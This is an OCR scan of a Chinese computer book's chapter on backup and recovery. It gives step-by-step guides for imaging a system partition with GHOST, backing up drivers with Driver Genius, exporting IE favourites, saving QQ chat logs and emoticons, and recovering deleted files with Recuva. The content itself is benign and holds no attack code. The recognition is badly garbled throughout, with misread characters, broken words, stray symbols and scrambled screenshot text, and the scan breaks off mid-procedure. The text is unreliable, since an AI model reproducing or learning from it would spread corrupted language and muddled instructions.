
GHOST 的 操作 界面 非常 简洁 实用 ， 如 下 图 所 示 ， 用 户 从 琳 单 的 名 称 束 可 以 基 
本 了 解 该 软件 的 使 用 方法 。GHOST 操作 界面 利用 瑞 文 ， 荣 单 命令 代表 的 含义 如 下 表 
所 示 。 
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Local 


Peer to peer 





> 





攻防 从 入 门 到 精通 


GHOST 操作 界面 


GHOST 菜单 命令 的 含义 


作 用 


本 地 操作 ， 对 本 地 计算 机 的 硬盘 进行 操作 
通过 点 对 点 模式 对 网 络 上 计算 机 的 硬盘 进行 操作 








Options 使 用 GHOST 的 一 些 选 项 ， 使 用 默认 设置 即 可 
Help 使 用 帮助 
Quit 退出 GHOST 
Disk 人 厂 盘 

Partition 磁 告 分 区 


To Partition 
To Image 


From Image 


将 一 个 分 区 和 直接 复制 到 为 一 个 分 区 
将 一 个 分 区 备份 为 镜像 文件 
从 镜像 文件 恢复 分 区 ， 即 将 备份 的 分 区 还 原 


2. 使 用 GHOST 备份 系统 
使 用 GHOST 备份 系统 是 指 将 操作 系统 所 在 的 分 区 制作 成 一 个 GHO 镜像 文件 。 备 份 时 
必须 在 DOS 环境 下 进行 ， 一 般 来 说 ， 目 前 的 GHOST 都 会 自动 安装 启动 菜单 ， 因 此 不 需要 再 
在 启动 时 插入 光盘 来 引导 了 。 现 在 详细 介绍 使 用 GHOST 备份 系统 的 具体 使 用 方法 和 步骤 。 
STEP01: 安装 GHOST 后 重启 STEP02: 进入 “一 键 GHOST 主 菜单 ” 
Windows 启动 管理 器 








一 键 GH0ST 主 蔷 单 
1. 一 谤 备份 杀 统 


(使 用 箭头 键 突 | 


选择 要 启动 的 操作 系统 ， 或 按 Tab 选择 工具 : 


显示 您 的 选择 ， 然 后 按 Enter。) 


面 = 
oo 
起 可 


4. GHOST 11.2 el 
帮助 (Ht) 六 重生 大 | msnos 


通过 键盘 上 的 方向 键 选择 “一 键 备份 系统 ”选项 ， 
然后 按 <Enter> 键 。 


5. DOS 





进入 开机 启动 菜单 后 在 键盘 上 按 ““ | ” 键 选择 “一 
键 GHOST”， 然 后 按 <Enter> 键 。 
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系统 和 数据 的 备份 与 恢复 


STEP03: 成功 运行 GHOST STEP04: 进入 GHOST 主 界 面 


[About STITTETYLT 


3are deermed fo be “cormrmercial cormpufter 
e docurmnentation” as defined in FRR 


To Image 


z 





弹出 一 个 启动 画面 ， 单 击 “OK ”按钮 。 选择 “Local”>"“Partition”>"To lImage” 命 令 。 


STEP05: 选择 硬盘 STEP06: 选择 分 区 


Select source partitionCs) from Basic drive: 1 





保持 默认 的 硬盘 ， 直 接 单 击 “OK” 按 钮 。 利用 键盘 上 的 方向 键 选 择 操 作 系 统 所 在 的 分 区 ， 此 
处 选择 分 区 1， 单 击 “OK” 按 钮 。 


STEP07: 保存 备份 文件 STEP08: 选择 备份 方式 
| File name to copy image to 


| Image C1916) | 
se System Wolume Informafion | Pe 


Type:? [NTFS], 21885 HB, 2364 HB used, 
from Local drive [1], 40960 lB 
Local file 1.3:\xp.6HO 





I 
选择 备份 文件 的 存放 路 径 并 输入 文件 名 称 ， 然后 。” 如 果 需 要 快速 备份 ， 单 击 “Fast” 按 钮 。 
单 击 “Save” 按 钮 。 
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取 
靳 > A 


STEP09: 确定 是 否 备 份 STEP10: 系统 开始 备份 


攻防 从 入 门 到 精通 


和 





Question: C1837) 


Type:? [NTFS], 21885 HB, 2364 HB used, Type:? [NTFS], 21885 HB, 2364 HB used, 
from Local drive [1], 40960 HB from Local drive [1], 40960 HB 
Local file 1.3:%::p.6HO Local file 1.3:\xp.6HO 


mn ® 
单 击 “Yes” 按 钮 。 可 查看 备份 进度 ， 耐 心 等 待 即 可 。 
STEP11: 备份 完成 





JImage Creafion Complefe (19257) 


查看 提示 信息 ， 单 击 “Continue” 按 钮 后 重新 启动 
计算 机 。 


Type:? [NTFS], 21885 HB, 2364 HB used, 
from Local drive [1], 40960 HB 
Local file 1.3:\xp.6HO 





季 
3. 使 用 GHOST 还 原 系 统 
使 用 GHOST 备份 操作 系统 以 后 ， 当 过 到 分 区 数据 被 破坏 或 数据 天 失 等 情况 时 ， 束 可 
以 通过 GHOST 和 镜像 文件 快速 地 将 分 区 还 原 。 现 在 详细 介绍 使 用 GHOST 人 还原 系 统 的 上 其 
体 使 用 方法 和 步骤 。 


STEP01: 进入 GHOST 主 界 面 STEP02: 选择 镜像 文件 


= 


From [mage 
ww 





> 


选择 “Local”> “Partition” >“ From lImage” 命 令 。 ”选择 要 还 原 的 GHOST 镜像 文件 ， 然 后 单 击 ”Open 
按钮 。 
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< 章 


STEP03: 确认 备份 文件 中 的 分 区 信息 


Select source partition from image file 


单 击 “OK” 按 钮 。 


STEP05: 选择 要 还 原 的 分 区 


Select destination partition from Basic drive: 1 


单 击 “OK” 按 钮 。 
STEP07: 开始 还 原 磁盘 分 区 


Type:? [NTFS], 21885 HB, 2364 HB used, No 
from Local file 1.3:\xp.6HO, 40960 HB 
Type:? [NTFS], 21885 HB 

from Local drive [1], 40960 HB 


好 
查看 还 原 进 度 ， 耐 心 等 待 即 可 。 





name 








系统 和 数据 的 备份 与 恢复 


STEP04: 选择 接 入 硬盘 


Select local destination drive by clicking on the drive number 





由 于 计算 机 只 接 入 了 一 个 硬盘 ， 保 存 默认 设置 即 可 ， 
单 击 “OK ”按钮 。 
STEP06: 确认 选择 的 硬盘 及 分 区 


Muestion: C1823) 


Type:? [NTFS], 21885 HB, 2364 HB used, No name 
from Lol:al file 1.3:s\sp.GHO, 40960 HB 

Type:? [NTFS], 21885 HB 

from Lo:al drive [1], 40960 HB 





单 击 “OK” 按 钮 。 
STEP08: 还 原 成 功 


[Clone Complelte C19 12) 
0 


Peset Rmputer 


Type:? [NTFS], 21885 HB, 2364 HB used, No name 
from Local file 1.3:\xp.6HO, 40960 HB 


Type:? [NTFS], 21885 HB 
from Local drive [1], 40960 HB 


生 


查看 提示 信息 ， 单 击 “Reset Computer” 按 钮 重 
启 计算 机 。 
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明 户 数据 





攻防 从 入 门 到 精通 


17:2.1 使 用 驱动 精灵 备份 与 还 原 驱动 程序 


驱动 精 灵 是 一 球 集 驱动 管理 和 便 件 检测 于 一 体 的 较为 专业 的 驱动 管理 和 维护 工具 。 豫 
动 精灵 为 用 户 提 供 张 动 备份 、 恢 复 、 安 猴 、 删 除 、 在 线 更 新 等 实用 功能 ， 一 旦 系统 出 现 开 
种 情况 ， 张 动 精灵 吏 能 在 最 短 时 间 内 让 便 件 恢复 正常 运行 。 

在 重 狼 操作 系统 前 ， 将 你 目前 计算 中 的 最 新 版 本 驱动 程序 通通 备份 下 来 ， 行 重 状 完成 











时 ， 再 使 用 驱动 程序 的 还 原 功能 安装 ， 这 样 ， 





且 再 也 不 怕 找 不 到 驱动 程序 了 。 
1. 使 用 驱动 精灵 备份 驱动 程序 


便 可 以 节省 挥 许多 安 状 驱动 程序 的 时 间 ， 并 


现在 详细 介绍 使 用 张 动 精 受 备份 驱动 程序 的 具体 使 用 方法 和 步骤 。 











册 恬 动 伏 调 | 条 从 还 | 


EE 二 
CY 已 经 备份 4 个 设备 ，2 个 设备 可 备份 
天 


版 本 : 6.1.7601.17514 







版 本 : 6.1.7601.17514 


版 本 : 6.0.1.6428 





版 本 :6.1.7601.18251 














版 本 : 6.1.7601.18231 




















单 击 “驱动 程序 ” 在 “备份 还 原 ” 选 项 
图 标 。 卡 中 单 击 “路 径 设置 ”。 


STEP03: 选择 要 备份 的 驱动 程序 






| 标 全 模式 | | 玩家 模式 | | 驱动 微调 名 份 还 原 
LY 已 经 备份 4 个 设备 ，2 个 设备 可 备份 
主板 本 

[| Intel(R) 82802 Firmware Hub Device 等 7 个 设备 版 本 : 6.1.7601.17514 已 备份 还 原 | 


版 本 : 6.1.7601.17514 已 各 份 还 原 








[x| High Definition Audio 控制 器 
“| 鼠标 











路 径 设置 一 键 备份 


d 已 连 授 他 光 动 入 习 服务 兹 












可 对 单个 驱动 程序 进行 备份 也 可 单 击 “ 一 键 
备份 ”按钮 一 次 性 全 部 备份 。 
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STEP02: 设置 驱动 备份 路 径 


驱动 精灵 系统 设置 项 ,请 根据 您 的 需要 进行 设置 


综合 设置 驱动 路 径 


Te 


驱动 下 载 路 径 (恢复 默认 路 径 ) 


[DAMyDrivers\update\ 选择 目录 





驱动 备份 路 径 (恢复 默认 路 径 ) 


D:\MyDrivers\backup\ 


选择 目录 





备份 设置 
回 备份 哎 动 到 文件 夫 (D) 
加 备份 开 动 到 ZIP 压 六 文 件 四 





设置 驱动 备份 路 径 ， 选 择 备份 到 文件 夹 还 是 ZIP 压 
缩 文件 ， 单 击 “ 确 定 ” 按 钮 。 


STEP04: 选择 是 否 履 盖 原 来 的 备份 


@ 设备 Intel(R) 82802 Firmware Hub Device 的 驱动 已 经 


过 ， 是否 覆盖 。 





单 击 “ 是 ”按钮 会 覆盖 原来 的 备份 文件 重新 进行 备 
份 。 





-和 17 章 
系统 和 数据 的 备份 与 恢复 


STEP05: 备份 完成 








文件 (F) ”编辑 (E) ”查看 (V) ”工具 (T) ”帮助 (H) 
组 织 ” ”包含 到 库 中 v” ” 新建 文件 夫 3 v _ 钱 @ 
^ 名称 4 修改 日 期 





Lj drivers.mf 2014/1/8 17:50 
= [a HID-compliant mouse.zip 
出 High Definition Audio 控制 器 zip 
[| Intel(R) 82801G (ICH7 Family) USB Un... :49 Ne 
册 Ten azeolo8 ooh gom rent 2014 275 改 一 在 设置 的 备份 路 径 中 查看 已 经 备份 的 压缩 文件 。 
| Intel(R) 82802 Firmware Hub Device.z.. 2 
固 Reakek High Definition Audiozip 2014/1/8 17:49 








2. 使 用 驱动 精灵 还 原 驱 动 程序 
备份 了 号 动 程序 后 ， 在 驱动 程序 丢失 、 损 坏 时 ， 丈 可 以 通过 驱动 精灵 来 还 原 所 有 怠 动 
程序 ， 从 而 重新 正 关 使 用 。 








下 和 面 详细 介绍 使 用 驱动 精灵 还 原 驱 动 程序 的 具体 操作 方法 和 步 又 。 
STEP01: 运行 驱动 精灵 STEP02: ”驱动 程序 元 成 更 新 


驱动 精灵 2013 








全 日 @ QQ 回 夭 


基本 状态 若 gzbj 芷 厅 站 系统 补丁 软件 管理 硬件 检测 “ 志 圾 清理 百 琅 箱 


| 标 人 模式 | | 玩家 模式 | | 驱动 钴 调 


全 已 经 成 功 备份 所 有 设备 驱动 ，, 共 6 加 








[vj Intel(R) 82802 Firmware Hub Device 等 7 个 设备 版 本 : 6.1.7601.17514 ”已 备份 


[| High Definition Audio 控制 器 


哺 ) = 


版 本 : 6.1.7601.17514 已 备份 


@ 驱动 程序 已 经 更 新 完成 , 需要 重新 启动 计算 机 才能 生效 ， 
”现在 就 重新 启动 吗 ? 






[ ] Realtek High Definition Audio 
Fy USB 设备 


癌 全 选 


版 本 : 6.0.1.6428 已 备份 










路 径 设置 和 
诈 已 连接 到 BE 动 精灵 服务 ;其 


换 至 “备份 还 “” 盟 勾 选 需要 还 原 的 驱动 程序 ， 单 击 “ 重 启 系统 ”按钮 ， 计 算 机 将 重新 启动 并 使 还 
原 ” 选 项 卡 。 然后 单 击 “ 还 原 ” 按 钮 。 原 的 驱动 程序 生效 。 











11.2.2 备份 与 还 原 正 浏览 器 的 收藏 夹 











了 正 浏览 器 的 收藏 夹 是 用 户 篆 用 的 一 项 功能 ,将 自己 喜欢 或 者 常用 的 网 站 加 入 收藏 夹 中 ， 
在 使 用 时 不 用 再 次 手动 输入 网 址 进行 搜索 ， 直 接 在 收藏 来 中 单 击 相 应 网 址 选项 即 可 打开 该 
网 站 。 但 是 由 于 下 浏览 器 是 Windows 操作 系统 中 上 自 带 的 一 和 浏览 堪 ， 重 闭 操 作 系 统 后 ， 卫 
浏览 器 也 会 重 交 ,之 前 收藏 的 网 址 都 会 被 清除 。 所 以 要 避免 这 点 ， 就 要 对 IE 浏览 器 的 收藏 
夹 进行 备份 ， 以 便 在 需要 时 将 其 还 原 到 系统 中 。 

1. 备份 IE 浏览 器 的 收藏 夹 

下 面 详 细 介绍 备份 下 浏览 费 的 收藏 夹 的 具体 操作 方法 和 步 又 。 
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取 ED rr > 
杀 打 攻防 从 入 门 到 精通 
小 全 人 人 他 


STEP01: 打开 IE 浏览 器 STEP02: 了 手 出 浏览 响 设 置 


你 希望 如 何 导 入 或 导出 你 的 浏览 器 设置 ? 


办 另 一 个 浏览 嚣 中 导入 必 ) 
因 从 文件 导入 CU) 


图 写 出 到 文件 应 ) 





癌 加 到 收藏 夫 (A).. Ctrl+D 


竣 加 到 收藏 夫 栏 {B) 
将 当前 所 有 的 网 页 竣 加 到 收藏 夫 (T).. 








< 上 一 步 (8) 
单 击 “查看 收藏 来 、 源 和 历史 记录 ”图 标 ， 然 后 依 选中 “导出 到 文件 ” 单 击 “ 下 一 步 ” 


次 单 击 “添加 到 收藏 来 ”>“ 导 入 和 导出 ”命令 。 单 选 按钮 。 按钮 。 
STEP03: 选择 导出 内 容 STEP04: 选择 要 导出 收藏 夹 的 文件 夹 


你 希望 导出 哪些 内 容 ? 选择 你 希望 从 哪个 文件 夹 导出 收藏 夫 








回收 藏 夹心 ) 
回 源 六 ) 
FCookie (C) 

















7 


义 选 要 导出 的 内 容 。 国 单 击 “ 下 一 步 ” 按钮 。 国 选中 要 导出 收藏 夹 辆 单 击 “ 下 一 步 ”按钮 。 
的 文件 夹 。 


STEP05: 选择 收藏 夹 导出 路 径 STEP06: 成 功 导出 收藏 夹 


你 希望 将 收藏 夹 导 出 至 何 处 ? 你 已 成 功 导出 了 这 些 设置 











国 单 击 “浏览 ”按钮 单 击 “ 导 出 ”按钮 。 单 击 “ 完 成 ”按钮 。 





选择 文件 路 径 。 

2. 还原 下 浏览 器 的 收藏 夹 

成 功 对 收藏 来 进行 备份 后 ,在 重 疙 完 系统 后 ， 用户 只 需 还 原 下 浏览 器 的 收藏 夹 便 可 瞬 
间 找 回 党 用 的 收藏 来 。 下 向 详细 介绍 还 原 了 正 浏 质问 的 收藏 夹 的 具体 操作 方法 和 步 又 。 
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STEP01: 打开 IE 浏览 器 





六 加 到 收藏 夹 [A).. 


滩 加 到 收藏 夫 栏 (B) 
将 当前 所 有 的 网 由 滩 加 天 收藏 夫人 M).. 








单 击 “ 查 看 收藏 夹 、 源 和 历史 记录 ”图 标 ,然后 依 ”图 选中 “从 文件 导 单 击 “ 下 一 步 " 
次 单 击 “ 添 加 到 收藏 天 ”> “导入 和 导出 ”命令 。 ”入 ” 单 选 按 钮 。 按钮 。 
STEP03: 选择 要 导入 的 内 容 STEP04:， 选 择 导 入 收藏 天 的 路 径 


你 希望 导入 哪些 内 容 ? 你 希望 从 何 处 导入 收藏 夹 ? 








键入 文件 路 径 或 浏览 到 文件 : 
收藏 夹 &) 一 


回 源 灾 ) 
加 Cookie (C) 








EF 





国 勾 选 要 导入 的 内 容 。 。 国 单 击 “下 一 步 ” 单 击 “ 浏 览 ” 按 钮 ,选择 文件 路 径 。 
按钮 。 


STEP05: 选择 书签 文件 STEP06: 完成 文件 路 径 选择 


你 希望 从 何 处 导入 收藏 夹 ? 





回 -” 团 





排列 方式 : 文件 夫 


键入 文件 路 径 或 浏览 到 文件 : 








4 公用 文档 (5) 
CA 用户 \ 公 用 
E 3 中 mh mh 
文件 名 (N): bookmark.htm 
选中 之 前 备份 的 hm” 国 单 击 “ 打 开 ” 按 钮 。 查看 已 选择 的 文件 单 击 “下 一 步 " 
文件 。 路 径 。 按钮 。 
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取 Pe > 
杀 打 攻防 从 入 门 到 精通 
小 全 人 人 他 


STEP07: 选择 要 导入 的 文件 夹 STEP08: 成 功 导 入 收藏 夹 





选择 导入 收藏 夫 的 目标 文件 夹 你 已 成 功 导入 了 这 些 设置 

















选中 要 导入 的 文 单 击 “ 导 入 ”按钮 。 单 击 “完成 ”按钮 ， 即 成 功 还 原 IE 浏 览 器 的 收藏 
件 夹 。 9 


由 于 使 用 I 下 浏览 器 导出 的 文件 格式 为 .htm 格式 ， 因 此 该 备份 文件 可 以 轻 
提示 。 松 地 被 所 有 浏览 器 所 导入 和 还 原 。 





11;2.3 备份 和 还 原 QQ 聊天 记录 


说 起 QQ 聊天 软件 ， 想 必 大 家 都 不 会 陌生 。 而 在 使 用 QQ 聊天 软件 进行 聊天 时 ， 会 产 
生 大 量 的 聊天 记录 。 虽 然 QQ 软件 上 自 带 了 在 线 备份 和 随时 得 阅 全 部 消息 记录 的 功能 ， 但 这 
需要 用 户 拥 有 QQ 会 员 权 限 才 能 实现 。 其 实 ， 用 户 在 不 是 QQ 会 员 的 情况 下 依然 可 以 对 聊 
天 记录 进行 备份 与 还 原 。 

1. 备份 QQ 聊天 记录 

下 面 详细 介绍 备份 QQ 聊天 记录 的 具体 操作 方法 和 步骤 。 


STEP01: 登录 QQ STEP02: 打开 “消息 管理 器 ” 





bh 老 多 [7/19] 
* 网 友 [5/1J] 
” 同事 [4/8] 
”工作 伙伴 [7/19 


”企业 好 友 [0 器] 
* 阳 生 [0/79 





在 QQ 主 界面 下 方 单 击 “ 消 息 ” 图 标 。 依次 单 击 “ 工 具 ”> “导出 全 部 消息 记录 ”命令 。 
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山 


系统 和 数据 的 备份 与 恢复 
STEP03: 选择 保存 文件 位 置 STEP04: 导出 消息 记录 


保存 在 中 前 的 文 相 - @ 笑 己 回 - 
名 称 修改 日 其 

360)s Files 2013/11/20 9;29 

AppData 2012/6/21 9:01 

DD FFOutput 2012/10/13 9:32 

PPTV 2012/11/13 8:54 

1 Tencent Files 2014/1/8 10:41 

Virtual Machines 2013/10/22 11:47 
2012/6/21 8:37 
2014/1/7 9:11 


正在 导出 消息 记录 ,… 











输入 文件 名 称 ， 然 后 单 击 “保存 ”按钮 。 查看 导出 消息 记录 进度 

2. 还 原 QQ 聊天 记录 

A Et OR 
来 介绍 还 原 QQ 聊天 记录 的 具体 操作 方法 和 步骤 。 


STEP01: 登录 QQ STEP02 打开 “消息 管理 器 ” 





”老乡 [7115] 

hb 网 友 [5/1J] 
同事 [4/8] 

* 工作 伙伴 [7/1 
企业 好 友 [0 站 ] 
* 阳 生 人 [0/79] 





在 QO 主 界面 下 方 单 击 “ 消 息 ” 图 标 。 依次 单 击 “ 工 具 ”>“ 导 入 消息 记录 ”命令 。 


i J 容 STEPO4: TTA a 





勾 选 要 导入 的 内 容 。 图 单 击 “ 下 一 步 ” 按钮 。 国 选择 文件 导入 方式 。 国 单 击 


浏览 ”按钮 。 
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二 [KK > 
杀 打 攻防 从 入 门 到 精通 
小 全 人 人 他 


STEP05: 选择 QQ 消息 记录 备份 文件 STEP06: 完成 备份 文件 选择 
R RSI 


请 选择 导入 湛 明 记录 的 方式 : 
〇 ) 自动 捷 索 导入 
C 〇 ) 从 指定 目录 导入 
@) 从 指定 文件 导入 
请 选择 导入 的 文件 ， 
可 导入 的 文件 兴 型 为 :*,db,*.bak 
D:\Documents\ 全 部 消息 记录 .bak 


Fy 








$ [= 


”局 


我 的 图 片 我 的 音乐 


公用 文档 (5) 


文件 名 多): 











选择 QO 消息 记录 备份 文件 后 单 击 “打开 ”按钮 。 单 击 “ 导 入 ”按钮 。 
STEP07: 正在 导入 消息 记录 STEP08: 消息 记录 导入 成 功 


“Cp 





正在 导入 消息 记录 .… 





查看 导入 消息 记录 进度 。 单 击 “ 完 成 ”按钮 


172.4 ”备份 和 还 原 锥 目 定 义 表 情 


人 们 在 用 QQ 与 好 友 聊 天 时 经 名 使 用 QQ 表情 ， 有 时 候 一 个 表情 比 文 学 更 有 表达 
力 ， 更 容易 体现 出 聊天 者 的 心情 、 看 法 等 。QQ 往往 目 带 一 些 表情 ， 但 是 这 些 表 情 比 
较 单 一 ， 有 时 难以 满足 用 户 的 需求 ， 这 时 用 户 融 可 以 手动 地 添加 一 些 目 己 喜欢 的 表情 
到 个 人 QQ 账号 中 。 为 了 保证 上 自己 添加 的 表情 不 致 丢失 ， 可 将 其 备份 ， 在 必要 时 再 进 
行 还 原 。 

1. 备份 QQ 自 定 义 表情 

在 腾讯 QQ 中 ， 目 定义 表情 一 般 都 保存 在 X:\Documents\Tencent Files\5*******7\Jmage 
文件 夹 中 ， 如 下 图 所 示 。 其 中 XX 代表 安 痛 QQ 的 磁盘 。 备 份 QQ 目 定 义 表 情 就 是 将 Image 
文件 夹 复制 并 粘贴 到 除 系统 分 区 外 的 其 他 分 区 中 , 并 且 要 为 备份 的 QQ 目 定 义 表 情 重 命名 ， 
最 好 突出 一 些 ， 以 便 使 用 时 人 查找 ，。 
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文件 (编辑 (E) ”查看 (V) ”工具 (T) ”帮助 (H) 
组 织 ” ”新 建文 件 夫 | 回 |~| 团 @ 


文档 库 排列 方式 文件 赤 > 


4 
> 三 


} 
$$3V5AR~($~E 。 $$TIL1487XmRI， 《ok ~anoxelRjG WoRB383 $)SL73162{L}EJ~ 。 $T 02]T~YR]HE 
VIKJM}VZOU.gi @WO PZz8VC.g D@$000}$2B6. @Z4ZV6BZ'V.gift 。 G1Zj2(A.gif V481R~3H7.gif 
f if i 





> ee 习 i 
kz 
全 v Vy > 和 ) (3 < (gs 
$8Y@CR}LUS'L $1BYIK2R3V{ER $1URUAYE7028 $2)%ZWTUN~I $3JFV${9]ODDS5 $4°CV]I941AND 


GMVKU5]$GKj 880UZW$K(V.gi V6GYO(~WBKj S~$SLYWCFN15.g ({N3Z4$Gjpg XNXHRGVW93j 
10,455 个 对 象 





QQO 自 定义 表情 存放 位 置 
2. 还 原 QQ 目 定 义 表情 
还 原 QQ 自 定义 表情 是 指 将 备份 的 QQ 自 定义 表情 添加 到 QQ 中 。 在 还 原 时 ， 用 户 可 
创建 新 的 分 组 将 要 还 原 的 QQ 自 定义 表情 单独 放 在 一 个 组 中 。 接 下 来 介绍 还 原 QQ 自 定义 
表情 的 具体 操作 方法 和 步骤 。 
STEP01: 登录 QQ STEP02: 查看 QQ 表情 


因 国 国 四 是 国 遇 力 起 人 四 国 四 | 
= 国 富 。 和， 和 全 则 但 ep (ee oy 全 CF ~ 民 忽 [66 四 四 9 也 be 
> | 


月 分 原创 : 【图 】 一 要 难 求 ! / 流 

















在 QO 主 界面 中 双击 一 个 QQ 好 友 图 标 。 单 击 “表情 ”图 标 ， 在 打开 的 表情 框 中 单 击 右 下 角 
的 “设置 ”图 标 ， 然 后 选择 “添加 表情 ”命令 。 
STEP03: 选择 备份 的 自 定 义 表情 STEP04: | 情 分 组 


5a 


.| $96IWOR83B3).… | $)SL73162{L)EJ~...) $_T_02]T~YRIJH... 


查找 范围 I): 出 Image 

















UL 二 田 免 子 
后 | 2361 


$8Y@CR}LUS'L...| $1BY[K2R3V{E.… $2}%ZWTUN~IS 育 口 小 怪 总 
| a FNI1S mif 


文件 名 9): “$2}%TWTUN IS“$LYJ CFN1S. gif” “$% “3DS v | i (0) 


文件 类 型 (T): 


























按 <Ctrlt+A> 快 捷 键 全 选 ， 然 后 单 击 “ 打 开 ” 按 钮 。 可 选择 将 这 些 自 定义 表情 加 入 已 有 的 分 组 中 或 者 新 
建 分 组 ， 此 处 单 击 “ 新 建 分 组 ”链接 。 
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卫 


上 ey ] 
关 有 2 攻防 从 入 门 到 精通 


合 人 他 他 





STEP05: 新 建 分 组 STEP06: 查看 自 定 义 表情 


a 驴 
Se 





输入 分 组 名 并 单 击 “确定 ”按钮 。 在 表情 框 中 可 查看 到 添加 的 自 定义 表情 。 


对 于 一 些 经 党 需要 变更 表情 的 用 户 来 说 ， 可 到 网 上 下 载 新 出 的 一 些 表 情 包 并 载 入 QQ 
表情 框 中 ， 接 下 来 介绍 导入 导出 表情 包 的 具体 操作 方法 和 步骤 。 


STEP01: 进入 QQ 表情 包 网 站 STEP02: 打开 QQ 表情 框 




















包子 是 www.3366.com 的 吉祥 物 。3366 周 年 庆 推 出 包子 系列 表情 。 他 各 埋 下 #t 太 
作者 : QQ[99255935] 。 发布 日 期 : 2011.6.29 二 kk 十 虽 1 表情 | 湿 
下 载 次 数 : 新 品 上 市 

如 但 OO 过 桔 


下 载 自己 喜欢 的 表情 包 。 单 击 “表情 ”图 标 ， 然 后 依次 单 击 “ 导 入 导出 表情 
包 ”>“ 导 入 表情 包 ” 命 令 。 
STEP03: 选择 已 下 载 的 表情 包 STEP04: 成功 导 入 表情 包 


查找 范围 0): “站 支 档 





”CO 


选中 下 载 的 表情 包 ， 单 击 “ 打 开 ” 按 钮 。 单 击 “ 确 定 ” 按 钮 。 
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STEP05: 查看 导入 的 表情 包 


商 { 站; 让 cc 国 
导入 的 包子 表情 。 


心 


] | 
次 7 | 守 | 4 十 原色 表情 | | 


STEP07: 选择 表情 包 的 保存 位 置 





保存 在 上 :国文 档 


讯 也 


萌 小 q. eif 


文件 名 加) : 
保存 类 型 (7): 


民 © 房 悄 国 
我 的 图 片 我 的 畜 乐 


: 
也 册 . 


CE 


选 定 保存 位 置 后 单 击 “ 保 存 ” 按 钮 。 


STEP09: 查看 导出 的 表情 包 


1®N ECESESE 
文件 “入 有 日 工具 (T) 帮助 (H) 








加 >- 国 。@ 

















组 织 v 和 像 打开 ~ 电子 邮件 新 建文 件 实 
次 收藏 夫 方 ” 文 档 库 
局 下 载 包括 : 3 个 位 置 
较 点 面 
罗 最 近 访 问 的 位 置 一 
1 月 
疗 库 
司 PPTV 视 频 12090.eif 
策 视频 | . 
图 迅 雪 下 载 
中 言 竹 trhsh 
(Fixed).bak.d 
网 家 庭 组 | 
2 | pm | 
Qp 荫 小 q.eif 修改 日 期 : 2014/1/8 15:50 
8 肥 EMOTION .File 大 小 : 967 KB 


排列 方式 : ”文件 赤 ~ 








bookmark.htm Default.rdp 
1 一 Ac 
WE \ 
trhsh,doc 萌 小 q.eif 


| 
| 


全 全 由 - i 
创建 日 期 : 2014/1/8 15:50 





系统 和 数据 的 备份 与 恢复 


STEP06: 导出 表情 


导入 导出 表情 包 
赣 节 表 情 包 


4》 十 原 镶 :表情 | 六 | 


单 击 表情 框 右 下 角 的 “设置 ”图 标 ， 然 后 依次 选择 
“导入 导出 表情 包 ” > “导出 本 组 表情 包 ” 命 令 。 


STEP08: 成 功 导 出 表情 








单 击 “ 确 定 ” 按 钮 。 


在 所 选择 的 存储 位 置 即 可 看 到 导出 的 表情 包 。 
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取 ra | > 
攻防 从 入 门 到 精通 





售 人 他 他 


17.3 | 使 用 恢复 工具 来 恢复 误 删除 的 数据 


1{7.3.1 使 用 Rectya 来 恢复 数据 


Recuva 是 一 个 由 Piriform 开发 的 可 以 恢复 被 误 删 除 的 任意 格式 文件 的 恢复 工具 。 
Recuva 能 直接 恢复 便 盘 、 闪 盘 、 存 储 卡 〈 如 SD 卡 ，MMC 卡 等 ) 中 的 文件 ， 只 要 没有 被 
重复 写 入 数据 ， 无 论 格式 化 还 是 删除 均 可 肌 接 恢复 。 

1. 通过 向 导 恢 复数 据 

Recuva 问 导 可 直接 选 定 要 恢复 的 文件 类 型 ， 从 而 进行 有 针对 性 的 文件 恢复 ， 此 处 以 恢复 
音乐 文件 为 例 介 绍 通过 Recuva 回 导 恢复 数据 的 具体 操作 方法 和 步骤 。 

STEP01: ”启动 Recuva 数据 恢复 软件 STEP02: 选择 文件 类 型 


Recuva 向 导 | Recuva 向 导 











| 文件 类 型 
欢迎 来 到 Recuva 向 导 您 在 恢复 什么 类 型 的 文件 ? 


个 您 恢复 您 品 需 回答 局 所 有 文件 (A) 
和 显示 所 有 文件 








已 图 片 (P) 
果 您 不 想 使 用 向 导 , 简单 的 单 击 一 下 取消 您 将 可 以 访 二 图 上 
提 Recuva et! 肖 以 只 显示 图 文件 ， 诸如 数码 照 . 


回音 乐 (M) 

只 显示 音乐 文件 , 例如 MP3 播放 器 的 音乐 文件 ， 
避 文 销 (D) 

只 显示 公共 办 公文 梯 格 式 , 例如 Word 和 Excal 文件 ， 
加 视频 (V) 

只 显示 视频 文件 , 便 志 数码 摄像 机 拍摄 的 片段 ， 


人 压缩 (CO 
只 显示 压 和 文件 . 
加 电子 邮件 (E) 
Show only emails from Thunderbird, Outlook Express, Windows Mail and Microso 人 ft 


OQutlook. 
辐 启动 时 不 显示 此 向 导 (D) 











i |E-Eu) | EE [EL 


在 “欢迎 来 到 Recuva 向 导 ” 界 面 中 单 击 “ 下 一 步 ” 选中 “音乐 ” 单 单 击 “ 下 一 步 " 


按钮 。 选 按 钮 。 按钮 。 
STEP03: 选择 文件 位 置 STEP04: 准备 查找 文件 


文件 位 置 
文件 在 哪里 ” 





@ 无 法 确定 (I) 


Td 中 的 所 有 位 置 ， 到 一 个 Recuva 查找 到 的 文件 列表 ， 


| 
— 一 一 恢 夏 的 文件 并 点 击 恢 复 按 人 园 ， 
生计 所 有 smi (除了 cD 和 软盘 ) 上 已 删除 的 文件 ， 


如 果 前 次 查找 文件 失败 , 请 勾 选 这 一 选 框 , 注意 此 操作 在 
太 驱 动 强 上 需要 超过 一 个 小 时 . 


回 | 启用 深度 搜索 人 p) 


OnaCD / DVD 


点 击 开始 执行 查找 ， 








返回 @) | 下 一 步 0D > 《返回 8】 | 开始 6) | 





无 法 确定 存放 位 置 时 选中 单 击 “ 下 一 单 击 “ 开 始 ”按钮 。 
ee 先 按钮 。 步 ”按钮 。 
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STEP05: 扫描 已 删除 的 文件 


扫描 1 共 5 个 驱动 恬 中 
步 1 共 3: 扫描 驱动 缆 的 已 星 除 区 件 中 
当前 进度 : 44, 已 找到 57372 个 文件 


| 
预计 璋 | 全 时 间 : 3 分 





显示 扫描 进度 条 。 


STEP07: 选择 音乐 文件 存储 位 置 


选择 恢 县 出 训 件 的 存放 位 直 


局 MessenPass 

上 Microsoft Web Application Stress 下 
) Misc 

ImusIc 


,MyDrivers 


选 定 存储 位 置 后 单 击 “ 确 定 ” 按 钮 。 
STEP09: 查看 已 恢复 的 音乐 文件 


查看 (V) 工具 (T) ”帮助 (H) 
